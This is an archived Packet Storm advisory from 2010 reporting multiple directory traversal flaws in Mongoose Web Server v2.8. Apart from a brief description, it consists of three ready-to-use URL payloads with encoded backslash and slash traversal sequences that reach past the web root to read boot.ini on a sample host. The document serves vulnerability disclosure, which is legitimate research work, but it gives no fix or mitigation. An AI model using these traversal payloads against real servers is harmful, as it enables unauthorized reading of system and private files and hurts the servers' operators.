Mongoose 2.8 Directory Traversal

2010-04-20T00:00:00
ID PACKETSTORM:88716
Type packetstorm
Reporter Dr_IDE
Modified 2010-04-20T00:00:00

Description

                                        
                                            `################################################################  
#  
# Mongoose Web Server v2.8 Multiple Directory Traversal Exploits  
# Found By: Dr_IDE  
# Date: Apr. 20, 2010  
# Tested On: Windows 7  
# Download: http://code.google.com/p/mongoose/downloads/list  
#  
################################################################  
  
- Description -  
  
Mongoose v2.8 is a Windows based HTTP server. This is the latest  
version of the application available.  
  
Mongoose v2.8 is vulnerable to many remote directory traversal attacks.  
  
- Technical Details -  
http://172.16.2.102//..%5C..%5C%5C..%5C..%5C%5C..%5C..%5C%5C..%5C..%5Cboot.ini  
http://172.16.2.102/..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini  
http://172.16.2.102/..%5C..%5Cboot.ini  
  
#[pocoftheday.blogspot.com]  
`